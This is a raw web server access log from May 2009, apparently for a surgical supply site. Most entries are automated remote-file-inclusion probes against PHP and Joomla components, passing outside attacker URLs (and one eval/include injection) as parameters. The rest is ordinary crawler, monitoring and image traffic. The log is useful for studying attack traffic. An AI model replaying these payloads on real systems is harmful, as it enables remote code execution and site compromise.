202.89.33.167 - - [12/May/2009:00:19:24 -0400] "GET /logs/access_log.Q108061400%20%20//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.info-design.fr//language/fonts/id1.txt?? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
202.89.33.167 - - [12/May/2009:00:19:54 -0400] "GET /logs/access_log.Q108061400%20%20//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.info-design.fr//language/fonts/id1.txt?? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
210.143.109.236 - - [12/May/2009:00:20:15 -0400] "GET /logs/access_log.Q108083100//modules/vwar/admin/admin.php?vwar_root=http://80.24.176.145/time//appserv/file.txt??? HTTP/1.1" 404 254 "-" "libwww-perl/5.65"
193.221.119.126 - - [12/May/2009:00:21:01 -0400] "GET /logs/index.php?option=com_fireboard&Itemid=&mosConfig_absolute_path=http://isportion.co.kr/kboard/lang/fatal1.txt???? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
193.221.119.126 - - [12/May/2009:00:21:01 -0400] "GET /logs/error_log.Q109011200/index.php?option=com_fireboard&Itemid=&mosConfig_absolute_path=http://isportion.co.kr/kboard/lang/fatal1.txt???? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
193.221.119.126 - - [12/May/2009:00:21:01 -0400] "GET /index.php?option=com_fireboard&Itemid=&mosConfig_absolute_path=http://isportion.co.kr/kboard/lang/fatal1.txt???? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
69.64.36.105 - - [12/May/2009:00:21:14 -0400] "GET /logs/access_log.Q109041200%20%20/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.musil.cz/obchod//components/com_virtuemart/js/mootools/id3.txt?? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
69.64.36.105 - - [12/May/2009:00:21:40 -0400] "GET /logs/access_log.Q108120100%20%20/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.musil.cz/obchod//components/com_virtuemart/js/mootools/id3.txt?? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
69.64.36.105 - - [12/May/2009:00:21:55 -0400] "GET /logs/access_log.Q108102400/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.musil.cz/obchod//components/com_virtuemart/js/mootools/id3.txt?? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
69.64.36.105 - - [12/May/2009:00:21:56 -0400] "GET /logs/access_log.Q108122100/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.musil.cz/obchod//components/com_virtuemart/js/mootools/id3.txt?? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
209.59.12.99 - - [12/May/2009:00:22:20 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
72.30.142.126 - - [12/May/2009:00:22:52 -0400] "GET /logs/access_log.Q108020300 HTTP/1.0" 404 224 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
222.239.76.25 - - [12/May/2009:00:22:54 -0400] "GET /index.php?option=com_fireboard&Itemid=&mosConfig_absolute_path=http://isportion.co.kr/kboard/lang/fatal1.txt???? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
222.239.76.25 - - [12/May/2009:00:22:54 -0400] "GET /logs/error_log.Q109011200/index.php?option=com_fireboard&Itemid=&mosConfig_absolute_path=http://isportion.co.kr/kboard/lang/fatal1.txt???? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
222.239.76.25 - - [12/May/2009:00:22:54 -0400] "GET /logs/index.php?option=com_fireboard&Itemid=&mosConfig_absolute_path=http://isportion.co.kr/kboard/lang/fatal1.txt???? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
80.91.189.12 - - [12/May/2009:00:23:20 -0400] "GET /logs/access_log.Q109011400////?_SERVER[DOCUMENT_ROOT]=http://www.ladyboss.com.ua/images/fx29id2.txt??? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
80.91.189.12 - - [12/May/2009:00:23:21 -0400] "GET /logs/access_log.Q108120400////?_SERVER[DOCUMENT_ROOT]=http://www.ladyboss.com.ua/images/fx29id2.txt??? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
218.150.79.146 - - [12/May/2009:00:23:34 -0400] "GET //skin/zero_vote/ask_password.php?dir=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
218.150.79.146 - - [12/May/2009:00:23:34 -0400] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
218.150.79.146 - - [12/May/2009:00:23:34 -0400] "GET /logs/access_log.Q108121900//skin/zero_vote/ask_password.php?dir=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
80.91.189.12 - - [12/May/2009:00:23:50 -0400] "GET /logs/access_log.Q109011400////?_SERVER[DOCUMENT_ROOT]=http://www.ladyboss.com.ua/images/fx29id2.txt??? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
80.91.189.12 - - [12/May/2009:00:24:07 -0400] "GET /logs/access_log.Q108120400////?_SERVER[DOCUMENT_ROOT]=http://www.ladyboss.com.ua/images/fx29id2.txt??? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
72.30.142.126 - - [12/May/2009:00:24:53 -0400] "GET /logs/error_log.Q107120600 HTTP/1.0" 404 223 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
66.249.72.114 - - [12/May/2009:00:24:55 -0400] "GET /images/items/store_pharma_section_over.jpg HTTP/1.1" 200 7409 "-" "Googlebot-Image/1.0"
210.143.109.236 - - [12/May/2009:00:25:46 -0400] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://80.24.176.145/time//appserv/file.txt??? HTTP/1.1" 404 232 "-" "libwww-perl/5.65"
210.143.109.236 - - [12/May/2009:00:25:46 -0400] "GET //modules/vwar/admin/admin.php?vwar_root=http://80.24.176.145/time//appserv/file.txt??? HTTP/1.1" 404 227 "-" "libwww-perl/5.65"
203.34.37.16 - - [12/May/2009:00:27:18 -0400] "GET /index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://www.prcentar.co.me/STARI/glup.txt? HTTP/1.1" 404 207 "-" "libwww-perl/5.79"
209.59.12.99 - - [12/May/2009:00:27:20 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
122.116.178.20 - - [12/May/2009:00:27:41 -0400] "GET /logs/access_log.Q108120300////?_SERVER[DOCUMENT_ROOT]=http://www.ladyboss.com.ua/images/fx29id2.txt??? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
122.116.178.20 - - [12/May/2009:00:27:41 -0400] "GET ////?_SERVER[DOCUMENT_ROOT]=http://www.ladyboss.com.ua/images/fx29id2.txt??? HTTP/1.1" 200 454 "-" "Mozilla/5.0"
122.116.178.20 - - [12/May/2009:00:27:41 -0400] "GET /logs/access_log.Q108081000////?_SERVER[DOCUMENT_ROOT]=http://www.ladyboss.com.ua/images/fx29id2.txt??? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
122.116.178.20 - - [12/May/2009:00:27:41 -0400] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://www.ladyboss.com.ua/images/fx29id2.txt??? HTTP/1.1" 200 1023 "-" "Mozilla/5.0"
190.144.44.36 - - [12/May/2009:00:28:30 -0400] "GET /main.php?sayfa=http://www.freewebtown.com/xisum2009/fx29id1.txt?? HTTP/1.1" 404 206 "-" "Mozilla/5.0"
190.144.44.36 - - [12/May/2009:00:28:30 -0400] "GET /logs/main.php?sayfa=http://www.freewebtown.com/xisum2009/fx29id1.txt?? HTTP/1.1" 404 211 "-" "Mozilla/5.0"
190.144.44.36 - - [12/May/2009:00:28:30 -0400] "GET /logs/access_log.Q108122900%20%20/main.php?sayfa=http://www.freewebtown.com/xisum2009/fx29id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
190.144.44.36 - - [12/May/2009:00:28:31 -0400] "GET /logs/access_log.Q108121300%20%20/main.php?sayfa=http://www.freewebtown.com/xisum2009/fx29id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
195.228.45.60 - - [12/May/2009:00:29:26 -0400] "GET /logs/access_log.Q108072400//components/com_facileforms/facileforms.frame.php?ff_compath=http://212.227.74.68/catalog/safe2.txt?? HTTP/1.1" 404 274 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
195.228.45.60 - - [12/May/2009:00:29:26 -0400] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://212.227.74.68/catalog/safe2.txt?? HTTP/1.1" 404 247 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
195.228.45.60 - - [12/May/2009:00:29:27 -0400] "GET /logs/access_log.Q108122500//components/com_facileforms/facileforms.frame.php?ff_compath=http://212.227.74.68/catalog/safe2.txt?? HTTP/1.1" 404 274 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
195.228.45.60 - - [12/May/2009:00:29:47 -0400] "GET /logs/access_log.Q108072400//components/com_facileforms/facileforms.frame.php?ff_compath=http://212.227.74.68/catalog/safe2.txt?? HTTP/1.1" 404 274 "-" "libwww-perl/5.805"
195.228.45.60 - - [12/May/2009:00:29:48 -0400] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://212.227.74.68/catalog/safe2.txt?? HTTP/1.1" 404 247 "-" "libwww-perl/5.805"
195.228.45.60 - - [12/May/2009:00:29:48 -0400] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://212.227.74.68/catalog/safe2.txt?? HTTP/1.1" 404 252 "-" "libwww-perl/5.805"
195.228.45.60 - - [12/May/2009:00:29:48 -0400] "GET /logs/access_log.Q108122500//components/com_facileforms/facileforms.frame.php?ff_compath=http://212.227.74.68/catalog/safe2.txt?? HTTP/1.1" 404 274 "-" "libwww-perl/5.805"
122.116.178.20 - - [12/May/2009:00:30:32 -0400] "GET /logs/access_log.Q108120300%20%20////?_SERVER[DOCUMENT_ROOT]=http://www.ladyboss.com.ua/images/fx29id2.txt??? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
122.116.178.20 - - [12/May/2009:00:30:33 -0400] "GET /logs/access_log.Q108081000%20%20////?_SERVER[DOCUMENT_ROOT]=http://www.ladyboss.com.ua/images/fx29id2.txt??? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
193.221.119.126 - - [12/May/2009:00:31:24 -0400] "GET /logs/error_log.Q109011200%20%20/index.php?option=com_fireboard&Itemid=&mosConfig_absolute_path=http://isportion.co.kr/kboard/lang/fatal1.txt???? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
218.150.79.146 - - [12/May/2009:00:31:28 -0400] "GET /index.php?page=http://www.powerledshop.com/tst//data/fx1?? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
218.150.79.146 - - [12/May/2009:00:31:28 -0400] "GET /logs/access_log.Q108072700/index.php?page=http://www.powerledshop.com/tst//data/fx1?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
218.150.79.146 - - [12/May/2009:00:31:28 -0400] "GET /logs/index.php?page=http://www.powerledshop.com/tst//data/fx1?? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
218.150.79.146 - - [12/May/2009:00:31:35 -0400] "GET /logs/access_log.Q108102400/index.php?page=http://www.powerledshop.com/tst//data/fx1?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
72.32.210.206 - - [12/May/2009:00:31:40 -0400] "GET ////?_SERVER[DOCUMENT_ROOT]=http://www.ladyboss.com.ua/images/fx29id2.txt??? HTTP/1.1" 200 454 "-" "Mozilla/5.0"
72.32.210.206 - - [12/May/2009:00:31:40 -0400] "GET /logs/access_log.Q108061400%20%20////?_SERVER[DOCUMENT_ROOT]=http://www.ladyboss.com.ua/images/fx29id2.txt??? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
72.32.210.206 - - [12/May/2009:00:31:40 -0400] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://www.ladyboss.com.ua/images/fx29id2.txt??? HTTP/1.1" 200 1023 "-" "Mozilla/5.0"
72.32.210.206 - - [12/May/2009:00:31:43 -0400] "GET ////?_SERVER[DOCUMENT_ROOT]=http://www.ladyboss.com.ua/images/fx29id2.txt??? HTTP/1.1" 200 454 "-" "Mozilla/5.0"
72.32.210.206 - - [12/May/2009:00:31:43 -0400] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://www.ladyboss.com.ua/images/fx29id2.txt??? HTTP/1.1" 200 1023 "-" "Mozilla/5.0"
72.32.210.206 - - [12/May/2009:00:31:43 -0400] "GET /logs/access_log.Q108061400%20%20////?_SERVER[DOCUMENT_ROOT]=http://www.ladyboss.com.ua/images/fx29id2.txt??? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
193.221.119.126 - - [12/May/2009:00:31:45 -0400] "GET /index.php?p=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
193.221.119.126 - - [12/May/2009:00:31:45 -0400] "GET /logs/index.php?p=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
193.221.119.126 - - [12/May/2009:00:31:45 -0400] "GET /logs/access_log.Q108072700%20%20/index.php?p=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
193.221.119.126 - - [12/May/2009:00:31:54 -0400] "GET /logs/access_log.Q108102400%20%20/index.php?p=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
218.150.79.146 - - [12/May/2009:00:32:14 -0400] "GET /logs/index.php?p=http://www.powerledshop.com/tst//data/fx1?? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
218.150.79.146 - - [12/May/2009:00:32:14 -0400] "GET /index.php?p=http://www.powerledshop.com/tst//data/fx1?? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
218.150.79.146 - - [12/May/2009:00:32:14 -0400] "GET /logs/access_log.Q108072700%20%20/index.php?p=http://www.powerledshop.com/tst//data/fx1?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
72.30.142.126 - - [12/May/2009:00:32:18 -0400] "GET /logs/access_log.Q108101800 HTTP/1.0" 404 224 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
209.59.12.99 - - [12/May/2009:00:32:20 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
218.150.79.146 - - [12/May/2009:00:32:31 -0400] "GET /logs/access_log.Q108072700%20%20/index.php?p=http://www.powerledshop.com/tst//data/fx1?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
218.150.79.146 - - [12/May/2009:00:32:31 -0400] "GET /index.php?p=http://www.powerledshop.com/tst//data/fx1?? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
218.150.79.146 - - [12/May/2009:00:32:31 -0400] "GET /logs/index.php?p=http://www.powerledshop.com/tst//data/fx1?? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
85.10.128.219 - - [12/May/2009:00:32:43 -0400] "GET /logs/access_log.Q108101700//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://212.227.74.68/catalog/safe2.txt?? HTTP/1.1" 404 267 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
85.10.128.219 - - [12/May/2009:00:32:43 -0400] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://212.227.74.68/catalog/safe2.txt?? HTTP/1.1" 404 240 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
218.150.79.146 - - [12/May/2009:00:32:48 -0400] "GET /logs/access_log.Q108102400/index.php?p=http://www.powerledshop.com/tst//data/fx1?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
218.150.79.146 - - [12/May/2009:00:32:49 -0400] "GET /logs/access_log.Q108072700/index.php?p=http://www.powerledshop.com/tst//data/fx1?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
72.32.210.206 - - [12/May/2009:00:32:57 -0400] "GET /logs/access_log.Q108070100%20%20////?_SERVER[DOCUMENT_ROOT]=http://www.ladyboss.com.ua/images/fx29id2.txt??? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
72.32.210.206 - - [12/May/2009:00:32:57 -0400] "GET /logs/access_log.Q108070100%20%20////?_SERVER[DOCUMENT_ROOT]=http://www.ladyboss.com.ua/images/fx29id2.txt??? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
85.10.128.219 - - [12/May/2009:00:33:00 -0400] "GET /logs/access_log.Q108101700//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://212.227.74.68/catalog/safe2.txt?? HTTP/1.1" 404 267 "-" "libwww-perl/5.805"
85.10.128.219 - - [12/May/2009:00:33:00 -0400] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://212.227.74.68/catalog/safe2.txt?? HTTP/1.1" 404 240 "-" "libwww-perl/5.805"
85.10.128.219 - - [12/May/2009:00:33:00 -0400] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://212.227.74.68/catalog/safe2.txt?? HTTP/1.1" 404 245 "-" "libwww-perl/5.805"
218.150.79.146 - - [12/May/2009:00:33:03 -0400] "GET /logs/access_log.Q108072700%20%20/index.php?page=http://www.powerledshop.com/tst//data/fx1?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
193.221.119.126 - - [12/May/2009:00:33:33 -0400] "GET /logs/index.php?page=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
193.221.119.126 - - [12/May/2009:00:33:33 -0400] "GET /logs/access_log.Q108072700/index.php?page=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
193.221.119.126 - - [12/May/2009:00:33:33 -0400] "GET /index.php?page=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
193.221.119.126 - - [12/May/2009:00:33:40 -0400] "GET /logs/access_log.Q108102400/index.php?page=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
218.150.79.146 - - [12/May/2009:00:33:48 -0400] "GET /logs/access_log.Q108102400%20%20/index.php?page=http://www.powerledshop.com/tst//data/fx1?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
193.221.119.126 - - [12/May/2009:00:33:49 -0400] "GET /logs/access_log.Q108072700/index.php?p=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
195.228.45.60 - - [12/May/2009:00:33:52 -0400] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://212.227.74.68/catalog/safe2.txt?? HTTP/1.1" 404 247 "-" "libwww-perl/5.805"
218.150.79.146 - - [12/May/2009:00:33:54 -0400] "GET /index.php?page=http://www.powerledshop.com/tst//data/fx1?? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
218.150.79.146 - - [12/May/2009:00:33:54 -0400] "GET /logs/access_log.Q108072700/index.php?page=http://www.powerledshop.com/tst//data/fx1?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
218.150.79.146 - - [12/May/2009:00:33:54 -0400] "GET /logs/access_log.Q108102400/index.php?page=http://www.powerledshop.com/tst//data/fx1?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
218.150.79.146 - - [12/May/2009:00:33:54 -0400] "GET /logs/index.php?page=http://www.powerledshop.com/tst//data/fx1?? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
218.150.79.146 - - [12/May/2009:00:33:57 -0400] "GET /logs/access_log.Q108102400%20%20/index.php?p=http://www.powerledshop.com/tst//data/fx1?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
72.32.210.206 - - [12/May/2009:00:34:04 -0400] "GET /logs/access_log.Q108061400////?_SERVER[DOCUMENT_ROOT]=http://www.ladyboss.com.ua/images/fx29id2.txt??? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
218.150.79.146 - - [12/May/2009:00:34:05 -0400] "GET /logs/access_log.Q108102400%20%20/index.php?p=http://www.powerledshop.com/tst//data/fx1?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
193.221.119.126 - - [12/May/2009:00:34:06 -0400] "GET /logs/access_log.Q108102400/index.php?p=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
72.32.210.206 - - [12/May/2009:00:34:07 -0400] "GET /logs/access_log.Q108061400////?_SERVER[DOCUMENT_ROOT]=http://www.ladyboss.com.ua/images/fx29id2.txt??? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
67.204.144.193 - - [12/May/2009:00:34:25 -0400] "GET /images/login_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB5; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
67.204.144.193 - - [12/May/2009:00:34:26 -0400] "GET /images/psearch_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB5; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
72.32.210.206 - - [12/May/2009:00:34:28 -0400] "GET /logs/access_log.Q108070100////?_SERVER[DOCUMENT_ROOT]=http://www.ladyboss.com.ua/images/fx29id2.txt??? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
67.204.144.193 - - [12/May/2009:00:34:28 -0400] "GET /images/login_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB5; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
67.204.144.193 - - [12/May/2009:00:34:28 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB5; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
72.32.210.206 - - [12/May/2009:00:34:32 -0400] "GET /logs/access_log.Q108070100////?_SERVER[DOCUMENT_ROOT]=http://www.ladyboss.com.ua/images/fx29id2.txt??? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
218.150.79.146 - - [12/May/2009:00:34:55 -0400] "GET /logs/access_log.Q108072700/index.php?p=http://www.powerledshop.com/tst//data/fx1?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
218.150.79.146 - - [12/May/2009:00:34:55 -0400] "GET /logs/access_log.Q108102400/index.php?p=http://www.powerledshop.com/tst//data/fx1?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
190.144.44.36 - - [12/May/2009:00:35:19 -0400] "GET /logs/access_log.Q108101100//include/admin.lib.inc.php?site_path=http://www.freewebtown.com/xisum2009/fx29id1.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
190.144.44.36 - - [12/May/2009:00:35:19 -0400] "GET //include/admin.lib.inc.php?site_path=http://www.freewebtown.com/xisum2009/fx29id1.txt?? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
190.144.44.36 - - [12/May/2009:00:35:19 -0400] "GET /logs//include/admin.lib.inc.php?site_path=http://www.freewebtown.com/xisum2009/fx29id1.txt?? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
210.143.109.236 - - [12/May/2009:00:35:27 -0400] "GET /logs/error_log.Q108102800/!scanhttp://80.24.176.145/time//appserv/file.txt??? HTTP/1.1" 404 272 "-" "libwww-perl/5.65"
210.143.109.236 - - [12/May/2009:00:35:27 -0400] "GET /logs/!scanhttp://80.24.176.145/time//appserv/file.txt??? HTTP/1.1" 404 251 "-" "libwww-perl/5.65"
210.143.109.236 - - [12/May/2009:00:35:27 -0400] "GET /!scanhttp://80.24.176.145/time//appserv/file.txt??? HTTP/1.1" 404 246 "-" "libwww-perl/5.65"
190.144.44.36 - - [12/May/2009:00:35:36 -0400] "GET /logs/access_log.Q109032800//include/admin.lib.inc.php?site_path=http://www.freewebtown.com/xisum2009/fx29id1.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
218.150.79.146 - - [12/May/2009:00:35:36 -0400] "GET /logs/access_log.Q108072700%20%20/index.php?page=http://www.powerledshop.com/tst//data/fx1?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
72.32.210.206 - - [12/May/2009:00:35:39 -0400] "GET /logs/access_log.Q108082100////?_SERVER[DOCUMENT_ROOT]=http://www.ladyboss.com.ua/images/fx29id2.txt??? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
72.32.210.206 - - [12/May/2009:00:35:39 -0400] "GET ////?_SERVER[DOCUMENT_ROOT]=http://www.ladyboss.com.ua/images/fx29id2.txt??? HTTP/1.1" 200 454 "-" "Mozilla/5.0"
72.32.210.206 - - [12/May/2009:00:35:39 -0400] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://www.ladyboss.com.ua/images/fx29id2.txt??? HTTP/1.1" 200 1023 "-" "Mozilla/5.0"
72.32.210.206 - - [12/May/2009:00:35:40 -0400] "GET ////?_SERVER[DOCUMENT_ROOT]=http://www.ladyboss.com.ua/images/fx29id2.txt??? HTTP/1.1" 200 454 "-" "Mozilla/5.0"
72.32.210.206 - - [12/May/2009:00:35:40 -0400] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://www.ladyboss.com.ua/images/fx29id2.txt??? HTTP/1.1" 200 1023 "-" "Mozilla/5.0"
72.32.210.206 - - [12/May/2009:00:35:40 -0400] "GET /logs/access_log.Q108082100////?_SERVER[DOCUMENT_ROOT]=http://www.ladyboss.com.ua/images/fx29id2.txt??? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
72.55.164.230 - - [12/May/2009:00:35:55 -0400] "GET /logs/access_log.Q109050700//include.php?path[docroot]=http://212.227.74.68/catalog/safe1.txt? HTTP/1.1" 404 237 "-" "libwww-perl/5.820"
72.55.164.230 - - [12/May/2009:00:35:55 -0400] "GET //include.php?path[docroot]=http://212.227.74.68/catalog/safe1.txt? HTTP/1.1" 404 210 "-" "libwww-perl/5.820"
72.55.164.230 - - [12/May/2009:00:35:55 -0400] "GET /logs//include.php?path[docroot]=http://212.227.74.68/catalog/safe1.txt? HTTP/1.1" 404 215 "-" "libwww-perl/5.820"
122.116.178.20 - - [12/May/2009:00:36:10 -0400] "GET /logs/access_log.Q108061000////?_SERVER[DOCUMENT_ROOT]=http://www.ladyboss.com.ua/images/fx29id2.txt??? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
122.116.178.20 - - [12/May/2009:00:36:10 -0400] "GET /logs/access_log.Q108072100////?_SERVER[DOCUMENT_ROOT]=http://www.ladyboss.com.ua/images/fx29id2.txt??? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
218.150.79.146 - - [12/May/2009:00:36:58 -0400] "GET /logs/access_log.Q108102400%20%20/index.php?page=http://www.powerledshop.com/tst//data/fx1?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
193.221.119.126 - - [12/May/2009:00:37:06 -0400] "GET /logs/access_log.Q108072700%20%20/index.php?page=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
193.221.119.126 - - [12/May/2009:00:37:08 -0400] "GET /logs/access_log.Q108102400%20%20/index.php?page=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
209.59.12.99 - - [12/May/2009:00:37:21 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
190.144.44.36 - - [12/May/2009:00:38:48 -0400] "GET /logs/access_log.Q108101100%20%20//include/admin.lib.inc.php?site_path=http://www.freewebtown.com/xisum2009/fx29id1.txt?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
190.144.44.36 - - [12/May/2009:00:39:04 -0400] "GET /logs/access_log.Q109032800%20%20//include/admin.lib.inc.php?site_path=http://www.freewebtown.com/xisum2009/fx29id1.txt?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
85.10.128.219 - - [12/May/2009:00:39:19 -0400] "GET /logs/access_log.Q108052400//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://212.227.74.68/catalog/safe2.txt?? HTTP/1.1" 404 267 "-" "libwww-perl/5.805"
121.254.64.69 - - [12/May/2009:00:40:04 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Foxy/1; Foxy/1)"
121.254.64.69 - - [12/May/2009:00:40:04 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Foxy/1; Foxy/1)"
121.254.64.69 - - [12/May/2009:00:40:09 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Foxy/1; Foxy/1)"
